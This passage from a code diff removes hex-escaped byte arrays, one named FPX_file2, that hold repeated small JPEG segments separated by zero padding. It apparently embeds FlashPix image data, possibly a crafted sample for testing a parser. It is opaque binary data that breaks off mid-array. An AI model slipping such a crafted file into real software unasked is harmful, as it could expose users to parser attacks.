-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00"
-"\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01"
-"\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a"
-"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a"
-"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a"
-"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a"
-"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x00"
-"\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8"
-"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01"
-"\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f"
-"\x00\xf5\x5a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x6c\x8e\x91\xc6\xd2"
-"\x48\xc1\x51\x41\x2c\xc4\xe0\x00\x3b\xd3\xab\x1b\xc4\xb0\x5c\xea"
-"\x16\xb1\x69\x36\xdb\xe3\x5b\xc6\x2b\x3c\xe1\x72\x23\x88\x0c\xb7"
-"\xe2\xdc\x2e\x3d\xcf\xa5\x00\x58\xd2\xb5\x9b\x4d\x4f\x4a\xfe\xd0"
-"\x8d\x8c\x31\x29\x60\xe2\x5f\x94\xc7\x8f\xef\x67\xa7\x18\x3f\x42"
-"\x2a\x27\xf1\x05\x8a\x6a\x0b\x01\x9e\x0f\x20\xc2\xf2\x9b\x9f\x34"
-"\x6d\x05\x5d\x57\x6f\xd7\x2d\xeb\xda\xb1\x75\x2d\x33\x51\xb2\x83"
-"\x54\x84\x3c\xda\x8c\x7a\x9d\xa4\x80\x94\x84\x29\x49\x55\x30\xa3"
-"\x0b\xc7\xcc\xbc\x67\xd5\x40\xef\x56\xaf\x60\x4b\x3f\x11\x69\x97"
-"\x4f\xa6\x4b\x2d\xad\xbd\x9b\xc7\xbe\x28\x77\x88\x18\xb2\xe0\xe0"
-"\x73\xd0\x11\xc0\xc8\xfa\x50\x07\x4d\x45\x14\x50\x01\x45\x14\x50"
-"\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50"
-"\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50"
-"\x01\x45\x14\x50\x01\x59\x7a\xd6\xa7\x3e\x9e\xf6\x51\x5a\xda\x8b"
-"\x99\xaf\x26\xf2\x54\x33\xec\x0a\x76\x96\xc9\x38\x3c\x0c\x73\x5a"
-"\x95\x9f\xa8\xd8\xc9\x77\x7f\xa6\xdc\x23\xaa\xad\xa4\xed\x2b\x83"
-"\xd4\x83\x1b\x2f\x1f\x8b\x0a\x00\xff\xd9\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00"
-"\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03"
-"\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\xe8\xae\xed\x67\xb5\xfb"
-"\x54\x37\x11\x49\x06\x09\xf3\x55\xc1\x5c\x0e\xbc\xf4\xa8\xe0\xd4"
-"\xf4\xfb\x88\x64\x9a\x0b\xeb\x69\x62\x8b\x99\x1d\x25\x52\x13\xea"
-"\x73\xc5\x73\x53\xd9\x5c\x5d\xb5\xed\xf5\xbd\x84\xab\x63\x25\xcc"
-"\x12\xb5\x9b\x26\xd6\xb8\x09\x9d\xed\xb0\xfa\xe5\x38\x38\x2d\xe5"
-"\xfb\xd2\x6b\xd1\x36\xae\xb7\x33\xe9\xd6\x17\x2a\x12\xc2\x68\xa4"
-"\x77\x81\xa3\x69\x8b\x01\xb6\x30\x08\x04\xe0\x82\x73\xdb\xa0\xea"
-"\x68\x03\xa6\x7d\x53\x4f\x4b\x6f\xb4\x3d\xf5\xba\xc3\xb8\xa7\x98"
-"\x64\x1b\x4b\x0e\xa3\x3e\xbc\x52\xc9\xa8\xd8\xc5\x66\xb7\x72\xde"
-"\x5b\xa5\xb3\xe0\x2c\xc6\x40\x11\xb3\xe8\x7a\x56\x16\xb1\x65\x34"
-"\x1a\xed\x9d\xda\x3d\xc4\x36\x71\xdb\x18\x50\xdb\x40\xb2\xf9\x2d"
-"\x9c\x9f\x94\xa9\x20\x11\x81\x90\x3f\x87\x07\xad\x53\x92\xcb\xca"
-"\xd2\x7e\xd5\xb3\x52\x4b\x83\x74\xf3\xc0\xcd\x68\xae\x43\x6c\xda"
-"\x77\x44\xa3\x85\x71\x9e\x0e\x0e\x4e\x72\x09\xa0\x0e\xaa\xeb\x50"
-"\xb2\xb3\x44\x7b\xbb\xb8\x20\x59\x3e\xe1\x92\x40\xbb\xbe\x99\xeb"
-"\x4b\x2d\xf5\x9c\x36\x82\xee\x5b\xa8\x52\xdc\xe0\x89\x4b\x80\xa7"
-"\x3d\x30\x7a\x56\x0d\xab\xcd\x63\xaa\xb5\xf6\xab\xa7\xcb\x9b\x9b"
-"\x58\x84\x6d\x04\x46\x51\x6e\x42\xfc\xf1\x61\x41\x20\x6e\x39\x07"
-"\xa1\xcf\xb5\x43\xa8\x5b\x3b\xc9\xa6\x5f\x5b\xda\x5d\x58\x59\xc4"
-"\x66\x26\x38\xad\xd1\x9e\x27\x62\x31\x21\x8f\x07\xa8\x0d\xd0\x64"
-"\x6e\xfa\xd0\x07\x48\xb7\xf6\x6f\x6c\xb7\x2b\x77\x01\x81\x8e\xd5"
-"\x90\x48\x36\x93\x9c\x63\x3e\xb9\xa2\xd2\xfa\xd2\xf9\x19\xec\xee"
-"\xa1\xb8\x55\x38\x63\x13\x86\x00\xfe\x15\xca\x1d\x31\xae\x6d\x24"
-"\x93\xec\xf7\xb3\xa5\xce\xa1\x6c\xce\xb7\x10\xaa\x6f\x55\x71\xb9"
-"\xf6\x28\x18\x18\xea\x58\x64\x85\x15\x73\x5c\xd3\xaf\x2e\x35\x0b"
-"\xf5\xb1\x80\xed\x9a\xc2\x35\x20\x7c\x8b\x29\x59\x09\x31\xee\xec"
-"\x4a\x92\x3f\xe0\x54\x01\xd3\xd1\x45\x14\x00\x51\x45\x14\x00\x51"
-"\x45\x14\x00\x51\x45\x14\x00\x51\x45\x14\x00\x51\x45\x14\x00\x51"
-"\x45\x14\x00\x51\x45\x14\x01\x88\x75\x3d\x52\x7b\xa7\xb3\xd3\xed"
-"\x2d\x64\x9a\xd9\x54\x5c\xcb\x2c\xac\xb1\xab\x90\x0e\xc5\xc2\x92"
-"\x78\x20\xe7\x8c\x64\x54\x30\xf8\x99\xcd\xb5\xdb\x5c\xe9\xd2\x45"
-"\x73\x05\xd2\xda\x25\xb2\xb8\x63\x2c\x85\x41\x00\x1e\x06\x39\xce"
-"\x7d\x06\x7d\xaa\x79\x2c\xb5\x3b\x1d\x52\xe6\xeb\x4a\x16\xd3\xc3"
-"\x78\x43\xcb\x04\xee\x63\x29\x20\x50\xbb\x95\x80\x39\x04\x01\x90"
-"\x47\x6e\x0f\x35\x4e\x2f\x0e\xea\x0f\x05\xdc\xb7\x57\xb0\xfd\xba"
-"\x4b\xc4\xbd\x86\x58\xd0\xec\x46\x54\x0a\x14\x8c\xf2\xb8\x05\x7a"
-"\xf2\x39\xeb\x40\x1a\x36\xb3\xeb\x26\xe1\x22\xd4\x34\xfb\x6f\x26"
-"\x5c\x83\x25\xb5\xc1\x6f\x2b\x8f\xe2\x0c\x01\x39\xe9\x91\xf9\x56"
-"\x4e\x97\xad\x4a\xb6\x5a\x4d\x96\x91\xa6\x86\x37\x76\x86\x74\x12"
-"\xdc\x12\x22\x00\x8f\xbc\xc4\x12\x47\xcd\xfc\xab\x62\xd4\xeb\x92"
-"\x5d\x46\x6f\x12\xc6\xde\x04\xce\xf1\x13\xb4\x8d\x21\xc7\x6c\x85"
-"\xda\x33\xcf\x7e\x95\x4f\x44\xd0\xae\x34\xe9\x74\xd7\x96\x58\xdc"
-"\x5a\x58\x35\xab\xed\xcf\x2c\x59\x0e\x47\xb7\xca\x68\x00\x6f\x11"
-"\xfd\x96\xc2\xf1\xb5\x1b\x75\x4b\xcb\x49\x96\x06\x8a\x39\x01\x59"
-"\x1d\xc0\x29\xb5\x8e\x30\x0e\xe1\xd7\xa6\x0f\xa5\x25\x97\x88\x65"
-"\xfe\xd0\x82\xd7\x50\xfe\xcf\xff\x00\x4a\x62\x91\x3d\x9d\xd7\x9b"
-"\xb5\xb0\x4e\xd6\x04\x03\xd0\x1e\x47\x19\xf4\xc8\xa2\xfb\xc3\xb2"
-"\x5e\x4b\xa9\xc8\x66\x88\x3d\xc4\xf0\xdc\x5b\x96\x5d\xc1\x1a\x35"
-"\x03\xe6\x1d\xc1\x20\xfe\x06\x9f\xa7\xe9\xb7\xa3\x50\x8a\x7b\x8b"
-"\x3d\x32\xc6\x28\x41\xca\xda\xa6\xf6\x94\xe3\xfb\xc5\x46\xd1\xdf"
-"\x8e\x7d\xe8\x02\x6f\x16\x4f\x25\xbf\x86\x2f\xde\x16\x2b\x2b\x47"
-"\xe5\xa3\x0e\xa1\x98\x85\x1f\xa9\xa8\xbe\xdb\x73\x6d\xac\x43\xa0"
-"\xe9\xf6\x88\xe9\x0d\xac\x72\xb4\xd2\xca\x40\x54\xdc\x53\x18\xc1"
-"\x25\xb0\xbc\x53\xfc\x60\x8c\xfe\x16\xbd\x64\x1b\x8c\x4a\xb3\x63"
-"\xd4\x23\x07\x3f\xa2\xd5\x88\x6c\xd9\xb5\xe9\x35\x44\x91\x1a\x19"
-"\xad\x23\x85\x40\xeb\x90\xce\xd9\xfa\x61\x85\x00\x00\xff\xd9\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00"
-"\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01"
-"\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\xab"
-"\x6d\x4f\x4f\xbb\x9d\xa1\xb5\xbe\xb7\x9e\x55\x19\x29\x1c\xa1\x88"
-"\x1f\x41\x4a\x9a\x8d\x8b\xde\x1b\x34\xbc\xb7\x6b\x91\x9c\xc2\x24"
-"\x05\x86\x3a\xf1\xd6\xb3\xa2\xb9\xb5\xbc\x68\x20\xb5\xd2\xee\x61"
-"\x95\x11\xb6\x49\x25\xaf\x96\x2d\x4e\xd2\x3a\x9c\x0e\xf8\xc2\xe7"
-"\xf2\xac\x0b\x1d\x3a\x6f\xec\xfb\x1d\x2e\x5f\xed\x31\x34\x52\x21"
-"\x92\x34\xb5\x8d\x56\x36\x52\x09\x90\x4a\x57\x04\x64\x13\x90\x4b"
-"\x1f\xa9\x34\x01\xd5\xeb\x3a\x8b\xe9\xb6\xb1\xc9\x15\xbf\xda\x25"
-"\x96\x64\x85\x23\xdf\xb3\x25\x8e\x39\x3d\xaa\x0b\x4d\x5e\x63\x7d"
-"\x1d\x9e\xa7\xa7\xc9\x63\x34\xd9\xf2\x5b\xcc\x12\x47\x21\x1c\x95"
-"\x0c\x3a\x1c\x73\x82\x07\x00\xfa\x53\x3c\x4e\xb2\x7d\x92\xce\x58"
-"\xe1\x96\x61\x0d\xec\x32\xba\xc4\x85\xd8\x28\x6e\x4e\x07\x26\xa1"
-"\x92\x79\x75\xbd\x4e\xc5\x20\xb2\xbb\x82\xda\xd2\x6f\xb4\x49\x3d"
-"\xc4\x46\x2c\x90\xac\x15\x54\x1e\x49\x3b\xb9\x38\xc0\x03\xde\x80"
-"\x2e\xe9\x3a\xdd\xae\xab\x63\x25\xc5\xb6\x43\x44\x48\x92\x26\xfb"
-"\xc8\x47\xf4\x3d\x41\xef\x54\xd7\xc4\x33\xdc\x7d\x9c\x58\x69\xa6"
-"\xe2\x49\x2d\x23\xbc\x92\x33\x30\x46\x54\x7e\x81\x72\x3e\x63\xc1"
-"\xf4\x1d\x39\xe6\xa9\xd8\xe9\x17\x91\xe8\x56\xb7\x56\x91\xf9\x3a"
-"\x94\x28\xe8\xd1\x49\xf2\x89\x90\xb3\x1f\x2d\xbd\x3a\xe4\x1e\xc4"
-"\xfa\x13\x9a\xd7\x2a\xf0\xe8\x76\x16\xf2\xe9\xd7\xf0\xea\x36\xd6"
-"\x71\xfd\x92\xe6\xde\x32\xec\x25\xda\x01\x8c\x91\xc0\x19\x03\x21"
-"\xbe\x52\x3e\x9c\x00\x76\x40\xe4\x03\x8c\x7b\x52\xd4\x70\x19\x0c"
-"\x11\x99\xc2\x89\x76\x8d\xe1\x7a\x03\x8e\x71\x52\x50\x01\x45\x14"
-"\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14"
-"\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x07\x3f\x1e"
-"\xb5\xaa\x5d\xdb\x3e\xa1\xa6\xe9\x91\x4d\x60\xa5\xb6\x6f\x9c\xac"
-"\xb3\xa8\x38\xdc\x8b\xb4\x80\x0f\x38\x04\xf3\xed\x9a\x96\x4d\x71"
-"\xee\xde\xda\x0d\x12\x04\xb9\x96\xe2\xdc\x5d\x6f\x99\x8a\x47\x1c"
-"\x67\xee\x96\xc0\x27\x24\xe4\x00\x07\x63\xe9\x51\x5b\xe9\xfa\xde"
-"\x9b\x62\x74\xcd\x35\xac\xda\xdd\x72\xb0\x5c\x4a\xcc\x1e\x24\x27"
-"\x80\x50\x0c\x31\x19\xc0\x39\x19\xc0\xcd\x3a\x3d\x16\xe3\x4a\x7b"
-"\x59\xb4\x63\x1c\x9e\x4d\xaa\xda\x49\x0d\xc3\x15\x12\x22\x92\x55"
-"\x83\x00\x70\xc0\x96\xec\x41\xcf\x6c\x50\x04\x1a\x9e\xab\x79\x36"
-"\x81\xad\x5b\x3d\xb2\x5b\xea\x16\xb6\xec\x5d\x44\xa7\x69\x46\x53"
-"\x89\x11\xb1\x9e\xc7\x8c\x0e\x46\x3d\xe9\x24\x92\xe2\x28\xbc\x33"
-"\x79\x71\x84\x98\xcc\x20\x91\x63\x90\xb2\xb2\xbc\x6d\xdc\xe3\x3c"
-"\xaa\x1a\xb1\xfd\x8d\x7b\x73\x69\xab\x4b\x7b\x2c\x02\xf7\x50\xb7"
-"\x36\xea\xb1\xe4\xc7\x0a\x05\x60\xa3\x27\x93\xcb\x12\x4f\x1d\x7a"
-"\x71\x4c\xd4\xe3\xc5\xdf\x87\x74\xbc\xee\x91\x26\xf3\x98\x8e\xcb"
-"\x1c\x67\x27\xfe\xfa\x2a\x3f\x1a\x00\xe8\x68\xa2\x8a\x00\x28\xa2"
-"\x8a\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02"
-"\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11"
-"\x00\x3f\x00\xf5\x5a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80"
-"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80"
-"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80"
-"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80"
-"\x0a\x28\xa2\x80\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01"
-"\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02"
-"\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80\x0a\x28\xa2\x80\x0a"
-"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a"
-"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a"
-"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a"
-"\x28\xa2\x80\x0a\x28\xa2\x80\x00\xff\xd9\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00"
-"\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03"
-"\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80\x0a\x28"
-"\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28"
-"\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28"
-"\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28"
-"\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x00\xff\xd9\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08"
-"\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda"
-"\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2"
-"\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2"
-"\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2"
-"\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2"
-"\x80\x0a\x28\xa2\x80\x0a\x28\xaa\x97\x5a\x95\x95\xa4\x82\x39\xee"
-"\x14\x4a\xdd\x23\x5c\xb3\x9f\xf8\x08\xc9\xa6\x93\x7b\x09\xb4\xb7"
-"\x2d\xd1\x50\x5d\x7d\xa4\xc2\x3e\xc7\xe5\x09\x09\x19\x32\xe7\x00"
-"\x7d\x07\x53\xed\xc5\x36\xce\x0b\x88\x43\x9b\x9b\xb6\xb8\x76\x3f"
-"\xdc\x0a\xab\xec\x00\xfe\xa4\xd1\x6d\x2e\x17\xd6\xc0\xff\xd9\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00"
-"\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01"
-"\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a"
-"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a"
-"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a"
-"\x28\xa2\x80\x0a\x28\xaa\x2d\xaa\xda\x7d\xa0\x41\x0b\xb5\xc4\xb9"
-"\xc1\x58\x54\xbe\xde\x71\xc9\x1c\x0f\xc6\x9a\x4d\xec\x26\xd2\xdc"
-"\xbd\x45\x56\xbc\x8e\xee\x40\xab\x69\x3c\x70\x03\x9d\xee\xd1\xef"
-"\x3f\x80\xce\x3f\x3a\x5b\x4b\x63\x6d\x19\x56\xb8\x9a\xe1\x98\xe4"
-"\xbc\xa4\x13\xf8\x60\x00\x07\xd2\x8b\x68\x17\xd6\xc4\x29\xab\x5b"
-"\x4d\x38\x8a\xd7\xcc\xb9\x3b\xb6\xb3\xc2\xb9\x44\xfa\xb7\x4f\xd7"
-"\x35\x25\xe4\x37\x53\x14\x5b\x7b\xbf\xb3\x27\x3b\xc8\x8c\x33\x1f"
-"\x4c\x13\xc0\xfc\x8d\x59\x00\x28\xc2\x80\x00\xec\x2a\x8e\xa5\xac"
-"\xe9\xfa\x5a\xe6\xf2\xe5\x11\xbb\x46\x39\x73\xf4\x03\x9a\xa5\xab"
-"\xf7\x51\x2f\x45\xef\x3f\xd0\x74\xfa\xad\x9c\x33\x79\x1e\x6f\x9b"
-"\x36\x71\xe5\x44\x0b\xb0\xfa\x81\xd3\xf1\xa9\x6f\x16\xed\x91\x56"
-"\xca\x48\x63\x62\x7e\x67\x91\x4b\x60\x7b\x00\x46\x4f\xe3\x52\xc7"
-"\x14\x71\x67\xca\x8d\x53\x71\xc9\xda\x31\x93\xeb\x4f\xa5\x75\xd0"
-"\x76\x6f\x72\xbd\x9d\xbc\xb0\x23\x79\xf7\x52\x5c\xbb\x1c\x96\x70"
-"\x00\x1e\xc0\x01\xc0\xa9\x91\x12\x35\xdb\x1a\x2a\x2f\xa2\x8c\x0a"
-"\x6c\xd3\x45\x6f\x11\x96\x79\x12\x24\x5e\xac\xe7\x00\x56\x1c\xbe"
-"\x26\x17\x32\x98\x34\x2b\x39\x75\x19\x47\x06\x41\xf2\xc4\xbf\x56"
-"\x34\xd4\x65\x3d\x89\x94\xe3\x0d\xcd\xf3\xc0\xc9\xac\x7b\xff\x00"
-"\x13\x69\xf6\xb2\xf9\x10\x33\xde\xdc\x9e\x90\xdb\x0d\xe7\xf1\x23"
-"\x81\x55\x7f\xb0\xf5\x3d\x53\xe6\xd7\xb5\x12\xb1\x1f\xf9\x74\xb4"
-"\xf9\x53\xe8\x4f\x53\xfe\x79\xad\x9b\x0d\x36\xcb\x4e\x8f\xcb\xb2"
-"\xb6\x8e\x10\x7a\x95\x1c\x9f\xa9\xea\x6a\xad\x08\xee\xee\x4d\xe7"
-"\x2d\x95\x8c\x6f\x27\xc4\x5a\xc7\xfa\xe9\x57\x47\xb6\x3f\xc1\x1f"
-"\xcf\x29\x1e\xe7\xb5\x5e\xd3\x7c\x3d\xa6\xe9\xaf\xe6\xc5\x07\x9b"
-"\x3f\x53\x3c\xc7\x7b\x93\xeb\x93\xd3\xf0\xad\x5a\x29\x3a\x8d\xab"
-;
-
-
-unsigned char FPX_file2[] = 
-"\x2d\x11\x4a\x94\x53\xbb\xd5\x80\xff\xd9\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00"
-"\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03"
-"\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80\x0a\x28"
-"\xa2\x80\x0a\x28\xa2\x80\x0a\x29\x92\xc8\x90\xc4\xd2\xc8\x70\x88"
-"\x32\x4e\x33\xc5\x55\xb5\xbf\x7b\xb9\x80\x8a\xce\x74\x83\x19\xf3"
-"\xa5\x1b\x33\xf4\x53\xf3\x7e\x82\x9a\x4d\xea\x26\xd2\x76\x2e\xd1"
-"\x48\x48\x00\x92\x70\x07\x7a\xa5\x0e\xa9\x0d\xcc\xeb\x1d\xac\x53"
-"\xce\x84\xf3\x32\xa6\x23\x5f\xf8\x11\xc6\x7f\x0c\xd0\x93\x60\xda"
-"\x5b\x97\xa9\xae\xeb\x1a\x33\xb9\xc2\xa8\xc9\x27\xb0\xaa\xf7\x76"
-"\xd7\x17\x0e\xa2\x3b\xd7\xb7\x8b\x18\x61\x1a\x8d\xcd\xff\x00\x02"
-"\x39\xc7\xe5\x52\x5b\xc2\x96\x96\xe2\x30\xee\x55\x72\x4b\x48\xe5"
-"\x8f\xa9\x24\x9a\x2c\xac\x17\x77\x2b\xdb\x6a\x42\xee\x75\x5b\x6b"
-"\x6b\x86\x84\xf5\x9d\x93\x62\xfe\x1b\xb0\x4f\xe0\x29\xf7\x76\x72"
-"\xdd\x48\x3f\xd3\x66\x86\x10\x39\x48\x70\xa5\x8f\xfb\xdd\x7f\x2a"
-"\xce\xbc\xf1\x45\x94\x73\x9b\x6b\x04\x97\x51\xba\xe9\xe5\xdb\x8c"
-"\x81\xf5\x6e\x9f\xce\xa0\xfb\x16\xbf\xab\xf3\xa8\x5d\x8d\x32\xdc"
-"\xff\x00\xcb\x0b\x53\x99\x0f\xd5\xbf\xc2\xb5\xe4\x6b\x57\xa1\x8b"
-"\x9a\x7a\x2d\x7d\x0b\xb7\x5a\xbe\x95\xa2\x42\xb6\xf2\x5c\x65\xd7"
-"\x85\x85\x49\x92\x43\xcf\xe2\x7f\x3a\xa5\xf6\xaf\x11\x6a\xfc\x59"
-"\xdb\x26\x95\x6c\x7f\xe5\xad\xc0\xdd\x29\x1e\xcb\xdb\xf1\xfc\xeb"
-"\x4b\x4c\xd0\xf4\xed\x2c\x66\xd6\xdd\x7c\xce\xf2\xbf\xcc\xe7\xf1"
-"\x35\xa3\x4b\x9a\x31\xf8\x55\xfd\x7f\xc8\x7c\x92\x97\xc4\xec\xbb"
-"\x2f\xf3\x21\xb4\xb7\xfb\x34\x3e\x5f\x9d\x34\xdc\xe4\xbc\xaf\xb9"
-"\x8d\x17\x37\x56\xf6\x70\x99\x6e\xa6\x8e\x18\xc7\xf1\x3b\x00\x2b"
-"\x0b\xfb\x4b\x5c\xd5\x8e\x34\xab\x2f\xb0\xdb\x9f\xf9\x78\xbb\x1f"
-"\x31\xfa\x25\x4b\x6d\xe1\x7b\x5f\x38\x5c\xea\xb3\x4b\xa9\x5c\xff"
-"\x00\x7a\x73\xf2\x8f\xa2\xf4\xc5\x37\x04\xb5\x9b\x05\x36\xf4\x82"
-"\x23\x6f\x12\x4d\x7e\xe6\x2f\x0f\xd8\x49\x78\x73\x83\x71\x28\x29"
-"\x10\xfc\x4f\x27\xf4\xa4\x5f\x0f\x5d\xea\x27\xcc\xf1\x06\xa0\xf3"
-"\x8e\xbf\x66\x80\x94\x88\x7f\x53\x5d\x0a\x2a\xa2\x05\x45\x0a\xa0"
-"\x60\x00\x30\x05\x3a\x97\xb4\xb7\xc0\xad\xf9\x87\xb2\xe6\xf8\xdd"
-"\xff\x00\x22\x0b\x4b\x3b\x6b\x28\x44\x56\x90\x47\x0a\x0e\xc8\xb8"
-"\xa9\xe8\xa2\xb2\x6e\xfb\x9a\xa5\x6d\x10\x56\x7e\xb1\xab\xdb\x69"
-"\x16\xc2\x49\xc9\x79\x1c\xe2\x28\x53\x96\x91\xbd\x00\xa8\x75\x9d"
-"\x72\x3d\x3d\xd2\xd6\xda\x33\x75\xa8\x4d\xc4\x56\xe9\xd7\xea\xde"
-"\x82\xa2\xd1\xf4\x47\x8a\xe0\xea\x5a\xb4\x82\xeb\x51\x7f\xe2\xfe"
-"\x18\x87\xf7\x54\x7f\x5f\xf2\x75\x8c\x12\x5c\xd3\xdb\xf3\x33\x94"
-"\xdb\x7c\xb0\xdf\xf2\x36\xe8\xa2\x8a\xc8\xd4\x28\xa2\x8a\x00\x2b"
-"\x0b\x57\xd6\xa6\xfb\x51\xd2\xf4\x58\xc5\xc6\xa0\x7e\xf3\x1f\xb9"
-"\x00\xf5\x63\xeb\xed\xff\x00\xea\x30\xde\xea\xb7\x7a\xb5\xe3\xe9"
-"\xba\x03\x61\x54\xe2\xe2\xfb\xaa\xc7\xec\xbe\xa7\xfc\xfb\x8d\x5d"
-"\x27\x4a\xb5\xd2\x6d\x3c\x8b\x55\x39\x27\x2f\x23\x72\xce\xde\xa4"
-"\xd6\xca\x2a\x1a\xcb\x7e\xdf\xe6\x62\xe4\xea\x69\x1d\xbb\xff\x00"
-"\x91\x06\x8b\xa2\x45\xa6\x2b\x4d\x23\x9b\x8b\xd9\x79\x9a\xe1\xfe"
-"\xf3\x1f\x41\xe8\x2b\x56\x8a\x2b\x29\x49\xc9\xdd\x9a\x46\x2a\x2a"
-"\xc8\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff"
-"\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11"
-"\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00"
-"\x3f\x00\xf5\x5a\x8e\x79\x56\x08\x5a\x57\x0c\x55\x46\x4e\xd5\x2c"
-"\x7f\x00\x39\x35\x9f\xab\x7d\x96\x23\xe7\x6a\x3a\x9c\x96\xf6\xe0"
